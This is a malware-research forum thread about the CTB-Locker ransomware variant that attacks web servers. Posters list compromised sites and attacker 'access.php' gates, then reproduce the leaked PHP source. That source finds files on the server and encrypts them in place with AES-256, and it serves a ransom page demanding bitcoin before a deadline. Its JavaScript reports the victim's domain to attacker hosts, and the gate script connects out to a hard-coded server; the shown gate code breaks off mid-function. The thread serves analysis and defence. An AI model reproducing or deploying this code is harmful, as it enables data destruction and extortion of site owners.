Belongs here
http://www.kernelmode.info/forum/viewto ... =16&t=3390
A forum for reverse engineering, OS internals and malware analysis
Another week, another spam run delivering CTB-locker.
Attachments
(799.92 KiB) Downloaded 105 times
Another one (localised, Dutch). Signed executable.
https://twitter.com/bartblaze/status/699996668348010497
https://twitter.com/bartblaze/status/699996668348010497
Attachments
(735.68 KiB) Downloaded 94 times
I do not remember that CTB Locker is attacking web servers but 70 website with CTB-locker payment reference:
reddit: https://www.reddit.com/r/sysadmin/comme ... ally_at_a/
"CTB-Locker afecta a servidores Linux": http://www.redeszone.net/2016/02/15/ctb ... res-linux/
Payment gate script:
Code: Select all
recent StackOverflow post about this: http://stackoverflow.com/questions/3552 ... ck-messageWe give you the opportunity to decipher 2 files free!
./admin/tool/generator/maketestplan.php
./blocks/configurable_reports/components/filters/users/plugin.class.php
To prove that you are an administrator, you must specify the name of the secret file that is in same directory with index.php.
reddit: https://www.reddit.com/r/sysadmin/comme ... ally_at_a/
"CTB-Locker afecta a servidores Linux": http://www.redeszone.net/2016/02/15/ctb ... res-linux/
Code: Select all
http://173.208.111.163/?page=freepage
http://72.29.93.37/moodle/
http://10bnct.ru/
http://www.24horasonline.net/
http://www.3gshoptshirt.com
http://amigomedia.net/ibizaah/
http://www.asiafacility.com/
http://www.assurance123.com/avance-de-fond-pour-mon-assurance-auto.php/feed?page=freepage
http://atronis.com/?page=freepage
http://australiandesignerweddings.com/
http://www.bagdattemizlik.com/hizmetlerimiz/22-ilaclama-hizmetleri.html
http://www.belclara.com/?page=freepage
http://bilkayseri.com/?page=freepage
http://blowmecool.com/my-account/
http://busakle.com/?page=freepage
http://www.bwasog.com/
http://catifiyat.com/cuvalli-eko-kiremit-alti-ortusu-p26587.html
http://www.care2kids.org
http://casaquintero.com/Down/
http://www.chinaqcinspection.com/
http://www.chaudierefioul.com/
http://www.concepticohost.com/conceptico.com/?page=freepage
http://www.consempre.com/
http://cornerstonefunding.net/
http://www.cursosapuestas.com/
http://www.cvanchen.com/?page=freepage
http://www.cylooks.com/
http://danidassoy.com/
http://www.davidjermainewilliams.com/?page=freepage
http://dennisnapper.com/
http://www.divorcelawbf.com/
http://ecba.biz/
http://www.eitanbehar.org/archives/tag/%D7%99%D7%A8%D7%95%D7%A9%D7%9C%D7%99%D7%9D/feed?page=freepage
http://emiliegriffin.com/
http://www.energieee.com/
http://www.etechlounge.com/
http://www.fashionstreaks.com/
http://www.fashionimm.com/women-s-stripe-color-block-splicing-knitting-casual-ol-pencil-dress-zip-matching-color-986.html?page=freepage
http://www.financepinoy.com/author/ruff/feed/?page=freepage
http://firsatikovala.com/
http://fedstone.ru/index.php/2-uncategorised/74-page-19793?page=freepage
http://gfxgod.com/AETONIXSYSTEMS.COM/
http://houseofcedar.net/?page=freepage
http://www.howtheyrank.com/
http://www.hyfcj.com/index.php?0caf2/x8rv.html
http://ifmedia.ru/
http://ifstusa.org/board-2/advisory-board/?page=index
http://www.imperialorgymusic.com/arete100/
http://www.kcchiefsblog.com/chiefs-will-face-pretty-sore-peyton-manning
http://www.klingenberg.it/
http://www.kolonker.com/news/?page=index
http://www.kusogg.com/tokaze/
http://www.lexdesign.net/
http://www.lingerieconcierge.com/
http://maureengallatin.com/inspiredbyhorses/
http://www.mayaraicu.com/tag/45-kg-de-cartofi/
http://medkrdnz.com/
http://www.moderndesignhk.com/index.php?page=freepage
http://mtool.by/
https://www.myisleofwightholiday.com/?page=freepage
http://www.narryhotelpatong.com/?page=index
http://northmacarthur.com/
http://www.nowontheclock.com/
http://p2pbikini.com/?page=freepage
http://papanreklame.com/corneliusjauhari.com/
http://penchantpublishing.com/nautiquesunique.com/
http://phspring.net/
http://www.quan100.net/index.php?m=tuan
http://repairair.org/about/
http://rikinfosys.com/ghureashi/
http://www.rykross.com/buglas.com/
http://sadquotesaboutlove.com/
http://www.sayin-yapi.com/
http://sevvalsenturk.com/?page=freepage
https://www.sick-pig.com/?page=freepage
http://singhsumit.com/
http://smartpenthousebangkok.com/
http://solmevini.com/
http://www.staygray.com/
http://www.swfldawgpound.com/
http://thesocialsme.com/
http://technicato.com/?page=freepage
http://thehumidor.info/?page=freepage
http://www.thienthaohotel.com/
http://tg-technologies.com/
http://vinabuhmwoo.com/
http://www.wagzpetsalon.com/
http://webelitesup.com/ferrari-red-48fw12.html?page=freepage
http://winsocialmedia.com/
http://wirepit.ch/OMGWTFNEWS.COM/
http://www.zagora-online.com/
http://www.zahiracollege.net/
Payment gate script:
Code: Select all
List of "decryption gate" extracted:
<script>
admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
$.post(admins[iadmin], postdata+"&domain="+domain, function (data) {
if (data["status"] == "success") {
onsuccess(data);
} else {
alert(data["status"]);
}
}, 'json'
).fail(function() {
alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');
iadmin = (iadmin + 1) % 3;
});
}
$('#decrypt').click(function() {
post_admin("decrypt=", function(data) {
alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');
url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];
});
});
$('#dectest').click(function() {
post_admin("dectest=&secret="+($("#secret").val()), function(data) {
alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');
url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];
});
});
$('#sendmsg').click(function() {
msg = "&msg=" + encodeURIComponent($("#chatmsg").val());
post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) {
alert('Thank you for feedback!');
});
});
$('#recvmsg').click(function() {
post_admin("recvmsg=&secret="+$("#secret").val(), function(data) {
$("#chatmsg").val(data["answer"]);
});
});
</script>
Code: Select all
http://a1hose.com/access.php
http://albatros46.ru/access.php
http://andreboily.com/access.php
http://associatedvac.alphaandomegamarketinggroup.com/access.php
http://autobot.sk/access.php
http://av-kazan.com/access.php
http://bormed.ru/access.php
http://bylleroseandalexwedding.com/access.php
http://cedrussauna.net/access.php
http://charoenpan.com/access.php
http://chenconstruction.aaomg.com/access.php
http://chrysolitemedia.com/cgi-bin/access.php
http://cngesi.com/access.php
http://corecanada.info/cgi-bin/access.php
http://cresynin.com/cgi-bin/access.php
http://danfill.cn/admin/Logs/access.php
http://directimeca.nationprotect.net/Old_Site_Backup_09-27-07/access.php
http://dostatsoseda.ru/access.php
http://electronics2.aaomg.com/access.php
http://erdeni.ru/access.php
http://farini.org/access.php
http://fastrentsrl.com/access.php
http://gaminggix.com/access.php
http://genevecorp.com/access.php
http://gjswan.com/access.php
http://inspirationbydesire.com/access.php
http://ivoxlab.net/access.php
http://jobsloaded.com/access.php
http://kemerthai.com/access.php
http://kibiifoundation.org/access.php
http://kjerrman.net/access.php
http://klinika-redwhite.com/access.php
http://konyalife.com/access.php
http://lawyerpublicity.com/access.php
http://legal-website-design.com/access.php
http://maxleathercases.aaomg.com/access.php
http://orangecountyplasterandstucco.com/access.php
http://ourfrontline.com/access.php
http://profibella.ro/access.php
http://pusintara.com/access.php
http://ruetzamps.com/access.php
http://salonincognito.aaomg.com/access.php
http://saunacushions.com/access.php
http://singaporegirlescorts.com/access.php
http://sosudistyezvezdochki.ru/access.php
http://stian.malkenes.com/access.php
http://studiogreystar.com/access.php
http://theexposuresgallery.com/access.php
http://toashavaccine.com/cgi-bin/access.php
http://velolenta.com/access.php
http://wanttosleepbetter.com/access.php
interesting leak on the CTB locker web version:
Code: Select all
<?php
//session_start();
//if (!isset($_SESSION["page"])) $_SESSION["page"] = "index";
$d = isset($_SERVER["HTTP_HOST"]) && $_SERVER["HTTP_HOST"] != "" ?
$_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"];
$proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://";
define("cur_domain", $d);
define("cur_url", $proto.$d.$_SERVER["REQUEST_URI"]);
require_once('crypt/AES.php');
require_once('crypt/Random.php');
//==============================================================================
function enc_excluded($victim) {
return !in_array($victim, array('./index.php', './allenc.txt', './test.txt', './victims.txt', './extensions.txt', './temp', './robots.txt')) &&
(false === strpos($victim, '/crypt/')) && (false === strpos($victim, 'secret_'));
}
//==============================================================================
function get_files($dir, $arr_ext, $maxsize, $filter) {
$files_list = array();
if ($dh = opendir($dir)) {
while (false !== ($file = readdir($dh))){
if($file == '.' || $file == '..'){
continue;
}
$path = $dir.'/'.$file;
$ext = explode('.', $file);
$ext = mb_strtolower(array_pop($ext));
if(is_file($path) && filesize($path) <= $maxsize &&
in_array($ext, $arr_ext) && call_user_func($filter, $path)) {
$files_list[] = $path;
}
elseif(is_dir($path)){
$files_list = array_merge($files_list, get_files($path, $arr_ext, $maxsize, $filter));
}
}
closedir($dh);
return $files_list;
}
return false;
}
//==============================================================================
/*
function crypt_file($fname, $cipher, $encrypt, $chunklen=10240) {
echo "crypt_file $fname\n"; #debug
$chunklen = $chunklen * 16 - ($encrypt ? 1 : 0);
$file = fopen($fname, 'r');
$temp = fopen('temp', 'w');
while (!feof($file)) {
$chunk = fread($file, $chunklen);
if ($chunk === "") continue;
$encrypted = $encrypt ? $cipher->encrypt($chunk) : $cipher->decrypt($chunk);
fwrite($temp, $encrypted);
}
fclose($file);
fclose($temp);
$file = fopen($fname, 'w');
$temp = fopen('temp', 'r');
while (!feof($temp)) {
$chunk = fread($temp, $chunklen);
fwrite($file, $chunk);
}
fclose($file);
fclose($temp);
}*/
//==============================================================================
function create_aes_cipher($key) {
$aes = new Crypt_AES();
$aes->setKeyLength(256);
$aes->setKey($key);
return $aes;
}
//==============================================================================
function crypt_file($fname, $cipher, $encrypt, $chunklen=10240) {
echo "crypt_file $fname ";
$chunklen *= 16;
$size = filesize($fname);
$file = @fopen($fname, 'r+');
if ($file === false) {
echo "FAILED\n";
return;
}
$seek = 0;
$eof = false;
$cipher->disablePadding();
$tm = time();
while (!$eof || (time() - $tm > 10)) {
@fseek($file, $seek);
$chunk = @fread($file, $chunklen);
$eof = $seek + strlen($chunk) >= $size; #feof($file);
if ($eof) {
//echo "eof<br>";
$cipher->enablePadding();
}
$crypted = $encrypt ? $cipher->encrypt($chunk) : $cipher->decrypt($chunk);
@fseek($file, $seek);
@fwrite($file, $crypted);
$seek += strlen($crypted);
//echo "Seek read: $seek, readed: ".strlen($chunk)." after crypt: ".strlen($crypted)."<br>";
}
ftruncate($file, $seek);
echo "OK truncated: $seek\n";
@fclose($file);
}
//==============================================================================
function encrypt_files($files, $keypass, $keytest) {
$allenc = file_exists('allenc.txt') ? explode("\n", file_get_contents('allenc.txt')) : array();
if (!file_exists('test.txt') || file_get_contents('test.txt') === '') {
echo 'getting test files\n';
$cipher = create_aes_cipher($keytest);
$test_files = $files;
shuffle($test_files);
$test_files = array_splice($test_files, 0, 2);
foreach ($test_files as $victim) {
crypt_file($victim, $cipher, 1);
file_put_contents('test.txt', $victim."\n", FILE_APPEND);
}
} else {
$test_files = explode("\n", file_get_contents('test.txt'));
}
$cipher = create_aes_cipher($keypass);
foreach ($files as $victim) {
if (!in_array($victim, $allenc) && !in_array($victim, $test_files)) {
crypt_file($victim, $cipher, 1);
file_put_contents('allenc.txt', $victim."\n", FILE_APPEND);
}
}
}
//==============================================================================
function decrypt_files($filelist, $keypass) {
if (!file_exists($filelist)) return;
$allenc = array_reverse(explode("\n", file_get_contents($filelist)));
$cipher = create_aes_cipher($keypass);
$fsize = filesize($filelist);
foreach ($allenc as $victim) {
if (!file_exists($victim)) continue;
crypt_file($victim, $cipher, 0);
$fsize -= strlen($victim) + 1;
$hfile = fopen($filelist, 'r+');
ftruncate($hfile, $fsize);
fclose($hfile);
}
}
//==============================================================================
if (isset($_POST['submit'])) {
// call this script until victims.txt != allenc.txt (without blank lines)
if (!file_exists('victims.txt') || file_get_contents('victims.txt') === '') {
$extensions = explode(' ', file_get_contents('extensions.txt'));
$victims = get_files('.', $extensions, 80*1024*1024, 'enc_excluded');
$victims = array_slice($victims, 0, 4000);
file_put_contents('victims.txt', implode("\n", $victims));
} else {
$victims = explode("\n", file_get_contents("victims.txt"));
}
encrypt_files($victims, $_POST['submit'], $_POST['submit2']);
exit("ALL_HAD_DONE");
}
//==============================================================================
function secret_ok() {
$secret = substr(md5("djf33".cur_domain), 2, 10);
return isset($_GET["secret"]) && $_GET["secret"] === $secret;
}
//==============================================================================
if (isset($_GET['decrypt']) && secret_ok()) {
decrypt_files('allenc.txt', $_GET['decrypt']);
decrypt_files('test.txt', $_GET['dectest']);
exit('Congratulations! ALL FILES WAS DECRYPTED!!');
}
//==============================================================================
if (isset($_GET['dectest']) && secret_ok()) {
decrypt_files('test.txt', $_GET['dectest']);
exit('Congratulations! TEST FILES WAS DECRYPTED!!');
}
//==============================================================================
?><!DOCTYPE html>
<html>
<head>
<title>CTB-Locker</title>
<meta charset="UTF-8">
<script src="http://code.jquery.com/jquery-latest.js"></script>
<style type="text/css">
body {
width: 100%;
height: 100%;
margin: 0px;
background-color: black;
}
.cloth {
margin: auto 40px auto 40px;
padding: 30px 130px;
background-color: #C3C3C3;
min-width: 700px;
}
.main {
border-radius: 10px;
background-color: #1D1D1D;
padding: 0px 20px 40px 20px;
}
.header {
padding: 5px 0px;
overflow: hidden;
border-bottom: 1px solid;
border-bottom-color: #AAAAAA;
}
.navcontainer, .navitem {
float: left;
}
.langs, .langs>a {
float: right;
}
.navitem:first-child {
margin-left: 0px;
}
.navitem {
margin: 0px 5px;
padding: 2px 4px;
border-radius: 4px;
color: black;
background-color: #777777;
width: 95px;
cursor: pointer;
font-size: 18px;
text-align: center;
color: turquoise;
}
.langs>a {
margin: 0px 5px;
}
.navitem:hover{
color: white;
background: #216091;
background: linear-gradient(to bottom, #216091, #3F89C6);
}
.content a {
color: yellow;
}
h2 {
color: #F67F05;
}
p, .list {
color: #DDDDDD;
}
iframe {
width: 560px;
display: block;
margin: 0 auto;
}
.list {
padding-left: 60px;
line-height: 1.4;
}
.btn {
margin-top: 10px;
border-radius: 4px;
padding: 2px 6px;
cursor: pointer;
background-color: #008000;
color: white;
text-align: center;
width: 300px;
}
.btn:hover {
background: #008000;
background: linear-gradient(to bottom, #008000, #00B500);
}
.secretbtn {
overflow: hidden;
}
.secretbtn>.seccls, .secretbtn>.btn {
float: left;
margin: 5px 10px 0px 0px;
}
.secretbtn>.btn {
width: 180px;
}
</style>
</head>
<body>
<?php
if (!isset($_GET["page"]) || !in_array($_GET["page"], array("index", "freepage", "chat"))) {
$_GET["page"] = "index";
}
//if (isset($_GET["page"]) && in_array($_GET["page"], array("index", "freepage", "chat"))) {
// $_SESSION["page"] = $_GET["page"];
//}
//if (isset($_GET["lang"]) && in_array($_GET["lang"],
// array("eng", "ger", "ita", "fra", "rus", "chi", "tur"))) {
// $_SESSION["lang"] = $_GET["lang"];
//}
?>
<div class="cloth">
<div class="main">
<div class="header">
<div class="navcontainer">
<a href="?page=index"><div class="navitem">Index</div></a>
<a href="?page=freepage"><div class="navitem">Free decrypt</div></a>
<a href="?page=chat"><div class="navitem">Chat</div></a>
</div>
<div class="langs">
<?php
function lurl($lang) {
echo "https://translate.googleusercontent.com/translate_c?act=url&depth=1&ie=UTF8&prev=_t&sl=eng&tl=$lang&u=".urlencode(cur_url);
}
?>
<a href="<?php lurl('en');?>"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACMAAAAZCAIAAAA0WgDFAAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwQAADsEBuJFr7QAAABh0RVh0U29mdHdhcmUAcGFpbnQubmV0IDQuMC4zjOaXUAAAAklJREFUSEtj4DMpYNTMFDAtZNDIAJKMmhmC5kX8JoWMGhn8CMFMAbOi/VwGlCCGuPIFRkFtXXN2Ai3onrfbMLA1sWphUvUiPf/m7rm7hMyLO+fsNA1pjyuff0TWgRLEwK6XA3Qyh14O0PlgdgaHfi5Wwf+UAYboknla3o0NU7YAg7Fp6lZNr4aEyoXxFQvUPOoap24FCjZO3aLr1xxTOu/rzfuUIAY23RwWnWwugzyg8zkN8li0s4AiIEHtLKAgMLbggmjhTipiCMmfpeJWW9K1ls+4oLR7nbJrbXTpvIiiOQrO1aXdIEGglJpHfXjh7HPOCZQgBmBC4DXOl3GoBEYMkOQxyhc0KwImBG4jFEFg2oOGN7mAwTVpoqxjZWzZfF7jAmA6BJrrnT7FPWWStH0FkAsUBErJO1UBRV5v2U8JYlB2qwX6wDS0A+h887AOIBsYmKrudcBsZAYWNAvrELYoVnKtQQt3UhGDQWCriGWJQ1wft2E+kAQaCrTAKLhNyKLYMR4kaB/XJ2pVYhzcdiOjgRLEADRXyrbcP3s6k1ZmYO4MSdtyoM8swjvFrEsDwIIBOTNk7CuAmRca3uQCBmDEcBrkAsMQmI6BCY9TPxeY6oAxB8yqcEFgcgdG1aO+BZQgBt/Maeqe9UUdq4GGloITNNB/gTkzgNYUd64BFhBAUtO7wSdjKlq4k4oY2vrXEYnQ3EgqYoCGIu0BA1oKoR1iQAtN2iEGtJxMO0THeDpjG00fRMd4+vH0JX0QHePpoLAFfRC94onLAACBwtWOU5UJUAAAAABJRU5ErkJggg=="/></a>
<a href="<?php lurl('de');?>"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACMAAAAZCAIAAAA0WgDFAAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwgAADsIBFShKgAAAABh0RVh0U29mdHdhcmUAcGFpbnQubmV0IDQuMC4zjOaXUAAAAHxJREFUSEvt0kEOQDAQheFJVPfKpkNs1HlwOM7Uo6iNG2AkTqB5FtKXL+3y3wxprXP8pELyKfykkkqv99eSPJlSaHdpMdVcGLTFlBSYg7UrmFRoZd7wQp1KET4s1XJ7drMMJ7e3T+0+NHBjS4fvT9/huVSKkEoxnpKD8/0FlEh/ctUq5JQAAAAASUVORK5CYII="/></a>
<a href="<?php lurl('ru');?>"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACMAAAAZCAIAAAA0WgDFAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAYdEVYdFNvZnR3YXJlAHBhaW50Lm5ldCA0LjAuM4zml1AAAAB6SURBVEhLY7h+/fpz2oObN28yvHnz5j/twfv370dtIhuM2kQJANkU07EmdsJ2WqPIjrUMnP7tDIH9tEZMvu2jNpGNRm2iBIFscnfNcHfNoTVycUpnOGCoc0Ffk9bosK46wwEj+tikMWoT2Wi42rTNQPuIrgat0Q4dNQDImKoFBQcxPgAAAABJRU5ErkJggg=="/></a>
<a href="<?php lurl('fr');?>"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACMAAAAZCAIAAAA0WgDFAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAYdEVYdFNvZnR3YXJlAHBhaW50Lm5ldCA0LjAuM4zml1AAAABESURBVEhLY2AwnIMflU089e//f/zoVXnuPUUB/GjUJlxo1CZcaNQm3GjUJlxo1CZcaNQm3GjUJlxo1CZcaNQmXEhRAADY9Y7b/Ez4LQAAAABJRU5ErkJggg=="/></a>
<a href="<?php lurl('zh-CN');?>"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACMAAAAZCAIAAAA0WgDFAAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwgAADsIBFShKgAAAABh0RVh0U29mdHdhcmUAcGFpbnQubmV0IDQuMC4zjOaXUAAAAT9JREFUSEvt0z1Lw0AcBvBndnJ1culQrdXgCwhSXPQLFAdnHURQQXAQBBc/gx/A7yBuiog4CzrU1c3Ju1xebEwTr7b0+r9Kc5fQRQq/IXnyhyd3l+BxGo3SyN2XJ/BWwufMMGwR/r4e2nqdG2gKj8H6biW+hPgJ7gYJbf3RFD+Dr5KElcEdkuSgmrxd+CcIz5AmaF62r70jsFkyXYRqEptoNZCmXckHvG0yyqoITvWNNUd2z3XQev9takLU1FD3aQ3RNfianhsiTXwFaYTvGyQuxJYa6mHzemKONIUHCM/b+yPq+LpQQx25962DNPW/sjyV3rXEKwgOIdZJaIU0DSEXFF0h2NFzc6ZNkvyrJC00l93EF/Qkn6ymCuJbePWB3F72mvw9/evIx+KcCho3FTFuKuK/Nj1UJ1+ckbtbnvoBuZnIcdVdbbAAAAAASUVORK5CYII="/></a>
<a href="<?php lurl('it');?>"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACMAAAAZCAIAAAA0WgDFAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAYdEVYdFNvZnR3YXJlAHBhaW50Lm5ldCA0LjAuM4zml1AAAABHSURBVEhLYzCczGgwhQEPatmf+e/ff/zow5J59xQF8KNRm3ChUZtwoVGbcKNRm3ChUZtwoVGbcKNRm3ChUZtwoVGbcCFFAQAxTIpdWZMjsQAAAABJRU5ErkJggg=="/></a>
<a href="<?php lurl('tr');?>"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACMAAAAZCAIAAAA0WgDFAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAFxEAABcRAcom8z8AAAAYdEVYdFNvZnR3YXJlAHBhaW50Lm5ldCA0LjAuM4zml1AAAAI4SURBVEhL7ZS/axRBFIB3ZnJ3TTgJqJdGu2v0CiX4I2D8ExS0OCF/QQqNXFrtTGxTmUjQQiRoaZTooYVEiKYQkysUtEyt3O3OzuzM7Oz5ZjfouplL9iLXiPDBLjtv3jfz3mMdSgoCk0HjE+LAI3KcQSMx+m86MPuYNPoFSl4yAfnpaUqy+ydO0tu3/OVl/+EDOjXlHzl8YJndBOmCUsmdn9dKdrvdSCn+6WPw5jVtbbr1OpwgE58Hiwk0EmPv8aMoikDDVl941aqKq8cLRffypfbExfjGv7fkwWpC9OoVrbXRvFwVxaJOrYbI6VSOSkxYudyXzGIKEWJrb0GjhKDVqjWddpAH/avVIFjCUXIoLSY+PKwFNxdaX4dE6SUgrhsyp1m4x758ps+fuXOzCu/fOYuJHT8WRaZ0wdMnVpN76rTfbGpphiXY3ublcibGis00MqJDBVn4qyZ0Jb0EQM8UJl6txjY2tI6kCOj5s3mmcccU12QHhTHf2gSTbP9gh0zbM8A26BNbWurcuE7HxzvX6nD1TMxuLCbY5k5Pw4jrrvbm7kAP0quAKJUUIu7EBUmwsf652guLCYBc7MN7uFYYKnemIYaG4lObQeCjle/nziTlyuzaG7vJFKcyytfeabhZpIPWln93ls406P2FduOmILvic9DDFDdDFAr+5KS/sqK+fgtaLba4SMfGkoHOBOehpwmAjECIMPwRYEySL+mAvtjLlCaxZj72RV7T3/OvmhiBhqNBwwn+CQX71Pj1QJBrAAAAAElFTkSuQmCC"/></a>
</div>
</div>
<div class="content">
<?php
if ($_GET["page"] == "index") echo <<<ENDECHO
<h2>Attention! What happened?</h2>
<p>Your personal files are encrypted by <font color="red"><b>CTB-Locker</b></font>.<br>
Your scripts, documents, photos, databases and other important files have been encrypted with strongest encryption algorithm AES-256 and unique key, generated for this site.</p>
<p>Decryption key is stored on a secret Internet server and <b>nobody</b> can decrypt your files until you pay and obtain the decryption key.</p>
<p>Learn more about the algorithm can be here:
<a href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">Wikipedia</a></p>
<p><a href="https://securityledger.com/2015/10/fbis-advice-on-cryptolocker-just-pay-the-ransom/">Fbi's advice on cryptolocker just pay the ransom</a></p>
<h2>What to do?</h2>
<p>We created for you this bitcoin address <font color="red">1EYzYEubQVTwP8HDrKD1UoNyh2iN9ztPv2</font></p>
<a href="https://blockchain.info/en/wallet/bitcoin-faq">What is a Bitcoin address?</a><br>
<p>For decrypt your files you need to make a few <b>simple</b> steps:<br></p>
<div class="list">
1. Get cryptocurrency Bitcoin<br>
We recommend:<br>
<div class="list">
1) <a href="https://localbitcoins.com/">https://localbitcoins.com/</a> - (Paypal, Visa/MasterCard, QIWI Wallet, Any Bank and etc.)<br>
2) <a href="https://en.bitcoin.it/wiki/Buying_Bitcoins_(the_newbie_version)">Buying Bitcoins (the newbie version)</a><br>
3) <a href="https://howtobuybitcoins.info/#!/">A complete list of exchanges!</a><br>
4) <a href="https://btc-e.com/">https://btc-e.com/</a> (OkPay, Perfect Money, Visa/MasterCard and etc.)<br>
5) <a href="https://www.okcoin.com/">https://www.okcoin.com/</a><br>
</div>
2. Send <font color="red">0.4 BTC</font> (~150$) to the address <font color="red">1EYzYEubQVTwP8HDrKD1UoNyh2iN9ztPv2</font><br>
3. After payment, confirmation is expected within from 15 minutes to 3 hours.<br>
You can track confirmations of your transaction in <a href="https://blockchain.info/address/1EYzYEubQVTwP8HDrKD1UoNyh2iN9ztPv2">https://blockchain.info/address/1EYzYEubQVTwP8HDrKD1UoNyh2iN9ztPv2</a><br>
4. Click button:
<div id="decrypt" class="btn">DECRYPT</div>
</div>
<h2>You must carry out this actions before: 2016-02-22 14:00:00</h2>
<p>At the expiry of the time redemption amount will be <font color="red">0.8 BTC</font>. Please make payment in a timely.</p>
<font color="red"><h3>Dangerous!</h3></font>
<p>Do not try to cheat the system, edit encrypted files, edit CTB-locker internal files or delete any file. This will result in the inability to recover your data, and we can not help you. Only way to keep your files is to follow the instruction.</p>
<iframe width="560" height="315" src="https://www.youtube.com/embed/hroPcR-0zSI" frameborder="0" allowfullscreen></iframe>
ENDECHO;
if ($_GET["page"] == "freepage") {
$test = "ALREADY DECRYPTED!";
if (file_exists('test.txt')) {
$t = str_replace("\n", "<br>", file_get_contents("test.txt"));
if ($t !== "") $test = $t;
}
echo <<<ENDECHO
<h2>Free decrypt</h2>
<p>We give you the opportunity to decipher 2 files free!</p>
<div class="list">$test</div>
<p>To prove that you are an administrator, you must specify the name of the secret file that is in same directory with index.php.</p>
<div class="secretbtn">
<div class="seccls"><input type="text" id="secret"/></div>
<div id="dectest" class="btn">DECRYPT IT FREE</div>
</div>
<p>You can make sure that the service really works and after payment for the CTB-Locker script you can actually decrypt the files.</p>
<p><font color="red">Do not attempt to replace free decrypted files because they have another encryption key! If you will try to decrypt by this key other files, you will break it.</font></p>
ENDECHO;
}
if ($_GET["page"] == "chat") echo <<<ENDECHO
<h2>Chat room</h2>
<p>If you have any questions or suggestions, please leave a english message below. To prove that you are an administrator, you must specify the name of the secret file that is in same directory with index.php. We will reply to you within 24 hours.</p>
<textarea id="chatmsg" rows="5" cols="80"></textarea>
<div class="secretbtn">
<div class="seccls"><input type="text" id="secret"/></div>
<div id="recvmsg" class="btn">RECIEVE</div>
<div id="sendmsg" class="btn">SEND</div>
</div>
ENDECHO;
?>
</div>
</div>
</div>
<script>
admins = ["http://erdeni.ru/access.php", "http://studiogreystar.com/access.php", "http://a1hose.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
$.post(admins[iadmin], postdata+"&domain="+domain, function (data) {
if (data["status"] == "success") {
onsuccess(data);
} else {
alert(data["status"]);
}
}, 'json'
).fail(function() {
alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');
iadmin = (iadmin + 1) % 3;
});
}
$('#decrypt').click(function() {
post_admin("decrypt=", function(data) {
alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');
url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];
});
});
$('#dectest').click(function() {
post_admin("dectest=&secret="+($("#secret").val()), function(data) {
alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');
url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];
});
});
$('#sendmsg').click(function() {
msg = "&msg=" + encodeURIComponent($("#chatmsg").val());
post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) {
alert('Thank you for feedback!');
});
});
$('#recvmsg').click(function() {
post_admin("recvmsg=&secret="+$("#secret").val(), function(data) {
$("#chatmsg").val(data["answer"]);
});
});
</script>
</body>
</html>
Nice! Was looking for this. Any clues how they got into the server you got that off of?
BleepingComputer.com
and finally the access.php file:
Code: Select all
<?php
header("Access-Control-Allow-Origin: *");
$debug = false;
if (!isset($_POST["domain"])) exit(json_encode(array("status" => "not_payed")));
function secret_ok() {
$secret = substr(md5($_POST["domain"]), 8, 8);
if (!isset($_POST["secret"]) || strpos($_POST["secret"], $secret) === false) {
exit(json_encode(array("status" => "incorrect secret")));
}
return true;
}
$dectest = md5("jnvsbkjsd".substr(md5($_POST["domain"]), 16, 8)."3j3j3j3");
if (isset($_POST["decrypt"]) ||
((isset($_POST["sendmsg"]) || isset($_POST["recvmsg"])) && secret_ok())) {
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock === false) {
if ($debug) echo "socket_create(): ".socket_strerror(socket_last_error())."\n";
exit();
}
$result = socket_connect($sock, "95.215.45.203", 9338);
if ($result === false) {
if ($debug) echo "socket_connect(): ($result) ".socket_strerror(socket_last_error($sock))."\n";
exit();
}
if (isset($_POST["decrypt"])) {
$req = "vic";
socket_write($sock, $req, strlen($req));
$req = str_pad($_POST["domain"], 128);
